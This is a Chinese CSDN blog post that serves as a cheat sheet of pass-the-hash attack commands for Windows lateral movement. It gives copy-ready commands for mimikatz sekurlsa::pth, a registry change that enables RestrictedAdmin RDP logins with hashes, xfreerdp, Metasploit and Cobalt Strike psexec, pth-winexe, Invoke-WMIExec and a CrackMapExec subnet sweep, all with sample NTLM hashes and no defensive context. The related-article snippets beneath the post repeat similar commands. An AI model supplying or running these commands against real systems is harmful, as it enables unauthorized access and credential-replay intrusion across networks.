pth常用工具

最新推荐文章于 2024-04-17 09:33:46 发布
最新推荐文章于 2024-04-17 09:33:46 发布
阅读量842 收藏
点赞数
分类专栏: 内网蠕动 权限维持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/112930754
版权

pth常用工具

实现rdp

windows

privilege::debug
sekurlsa::pth /user:administrator /domain:remoteserver /ntlm:d25ecd13fddbb542d2e16da4f9e0333d "/run:mstsc.exe /restrictedadmin"

kali
开启注册表允许pth

REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

xfreerdp /u:administrator /pth:d25ecd13fddbb542d2e16da4f9e0333d /v:192.168.62.136 /cert-ignore

PTH

msf

psexec psexec_pth psexec_command

cs

jump psexec 10.10.10.10 c2

kali

pth-winexe -U Administrator%d747b7b8037e8669c771f6a9d803419b:86c01dc8633fc387a503b05615f8afb1 //192.168.1.178 cmd

powershell
https://github.com/Kevin-Robertson/Invoke-TheHash/

Invoke-WMIExec -Target 192.168.1.161 -Domain WORKGROUP -Username  Yoga -Hash AAD3B435B51404EEAAD3B435B51404EE:14CE14C36F1F350380B41C6F4D42BC06 -Command "calc.exe" -verbose

CrackMapExec

https://github.com/byt3bl33d3r/CrackMapExec

pip install crackmapexec

批量pth

crackmapexec 192.168.0.0/24 -u administrator -H d747b7b8037e8669c771f6a9d803419b:86c01dc8633fc387a503b05615f8afb1

执行命令

crackmapexec smb 192.168.1.161 -u Yoga -H AAD3B435B51404EEAAD3B435B51404EE:14CE14C36F1F350380B41C6F4D42BC06 --exec-method wimexec -x whoami

#参考文章
https://yoga7xm.top/2019/04/12/IPentest-domain3/

whojoe
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pth-toolkit:传递哈希工具集合的修改版本可以直接开箱即用
06-26
pth-工具包 传递哈希工具集合的修改版本设计为便携,即使在最“裸露的骨骼”系统上也可以直接开箱即用 master 分支是为 amd64 编译的,最终目标是将这些工具交叉编译到所有可能的架构 目前,此 repo 提供以下修补工具/实用程序: winexe 微信 管理系统 客户端 客户端 获取 网 要求 sh 所有工具都在只有base包的裸机 Arch linux 安装上进行了测试。 这什么时候有用? 当您使用自定义渗透测试操作系统并且您不想自己经历编译和修补这些工具的痛苦时 用于从受感染的 *nix 主机转向 Windows 框/域的后利用! 只需克隆这个 repo 或下载 tarball 就可以传递所有的哈希值了!
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
在实际攻击场景中,Mimikatz是一个常用工具,它可以用于PTH和PTK攻击,例如案例1展示了如何使用Mimikatz进行PTH传递,而案例2则演示了如何进行PTK传递。此外,MS14-068漏洞利用(如案例3所示)通常结合Kekeo工具和...
内网横向移动—PTH哈希&PTT票据&PTK密匙&Kerberos
剁椒鱼头没剁椒的博客
07-17 1349
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!
探索PTH Toolkit:提升渗透测试效率的秘密武器
最新发布
gitblog_00041的博客
04-17 384
探索PTH Toolkit:提升渗透测试效率的秘密武器 项目地址:https://gitcode.com/byt3bl33d3r/pth-toolkit 项目简介 PTH Toolkit是一个由安全研究者byt3bl33d3r开发的渗透测试工具集,它主要针对Linux环境,旨在帮助安全专家和红队操作人员快速、高效地执行各种任务,如身份伪造、密码重放攻击等。项目链接如下: 技术分析 PTH To...
内网PTH攻击
weixin_44023460的博客
05-25 278
REG ADD “HKLM\System\CurrentControlSet\Control\Lsa” /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f //开启Restricted Admin mode。crackmapexec smb 192.168.100.0/24 -u administrator -H NTLM-HASH.txt(收集到的hash字典) -x whoami -d workgroup。
rdp连接工具_横向渗透之 [RDP]
weixin_39928940的博客
11-27 1456
重生信息安全T3ngYu一、RDP 服务确定和启动 1. 确定RDP服务是否启动和服务端口 (1)注册表查询REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启 REG QUERY "HKEY_LOCAL_MACH...
PyTorch中的一些数据操作
weixin_44558721的博客
08-16 430
PyTorch基本数据操作
域渗透-横向移动(PTH)
m0_58596609的博客
11-15 2385
一. Windows本地认证 基础知识 Windows内部是不保存明文密码的,只保存密码的hash。 本机用户的密码hash是放在本地的SAM文件 里面,域内用户的密码hash是存在域控的NTDS.DIT文件里面。 SAM文件位置:%SystemRoot%\system32\config\sam 当我们登录系统的时候,系统会自动地读取SAM文件中的“密码”与我们输入的“密码”进行对比,如果相同,则认证成功。 密码格式 Administrator:500:AAD3B435B51404EEAAD3B4
品质管理七工具.pptx
10-14
【品质管理七工具】是质量管理领域中一组常用的数据分析和问题解决工具,它们分别是检查表、分层法、散布图、排列图、直方图、因果图和控制图。这些工具帮助企业和组织对产品质量进行系统性的监控和改进,确保产品和...
品質管理七工具.pptx
10-14
【品质管理七工具】是质量管理中的一套常用方法,旨在通过数据收集和分析来改进产品或服务的质量。这些工具包括检查表、分层法、散布图、排列图、直方图、因果图和控制图。下面将逐一详细介绍这些工具及其应用。 1....
品质七大管理工具.pptx
10-14
【品质七大管理工具】是质量管理中常用的一组统计分析方法,它们可以帮助企业系统地收集、分析数据,识别问题,从而制定有效的改进措施。这七大工具包括检查表、分层法、散布图、排列图、直方图、因果图以及控制图。...
内网横向之PTH
qq_44029310的博客
10-16 1906
内网横向之PTH,以前的笔记整理,方便查看翻找。本文包括PsExec、CrackMapExec和WMI。
内网渗透—哈希传递攻击PTH的几种方式
oiadkt的博客
03-11 688
内网渗透—哈希传递攻击PTH的几种方式
Linux 远程连接Windows执行命令方法总结
sojrs_sec的博客
09-20 5783
winexe winexe在kali里面自带,用于在linux平台连接windows机器 环境要求:开启文件共享,即smb服务;禁用UAC远程限制 pth-winexe -U username%password //remote_ip cmd.exe --system 支持ntlm hash直接登录 若报错 E_md4hash wrapper called. ERROR: CreateSe...
内网渗透-【横向移动】PsExec工具远程命令执行横向移动
lza20001103的博客
04-15 1008
内网渗透-【横向移动】PsExec工具远程命令执行横向移动
ethtool工具介绍
kwame211的博客
08-01 2063
描述: Ethtool是用于查询及设置网卡参数的命令。 概要:  ethtool ethX      //查询ethX网口基本设置 ethtool –h        //显示ethtool的命令帮助(help) ethtool –i ethX    //查询ethX网口的相关信息  ethtool –d ethX    //查询ethX网口注册性信息 ethtool –r et
PTH横向移动
网络安全。
02-24 4671
0x01 简介 PTH全称“pass the hash”,即hash传递。PTH通过smb服务进行,走445端口。 0x02 通过PTH横向移动 一、通过cobaltstrike进行PTH 1、在已上线机器中直接dir访问目标系统C盘,提示没权限。 beacon> shell dir \192.168.3.123\c$ 2、此处使用先前已获取的hash对目标administrator用户...
Mimikatz 攻防杂谈
07-21 636
前几天看到了老外一篇讲 mimikatz 防御的文章,感觉行文思路还不错,但是内容稍有不足,国内也有一篇翻译,但是只是照着错误翻译的,所以就萌生了把那篇优秀文章,翻译复现,并加入其它一些内容,本文只是抛砖引玉,文中有错误的话,欢迎吐槽。 mimikatz 在内网渗透中是个很有用的工具。它可能让攻击者从内存中抓到明文密码。大家都知道这个工具很厉害,微软肯定也知道了,所以就搞了一些安全防护...
pth 转pdparams 的exe工具
05-20
我了解到您想要将 PyTorch 的模型文件(.pth)转换为 PaddlePaddle 的模型文件(.pdparams)。PaddlePaddle 官方提供了一个名为“convert_weights”的工具,可以实现这个功能。您可以使用以下命令安装此工具: ``` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值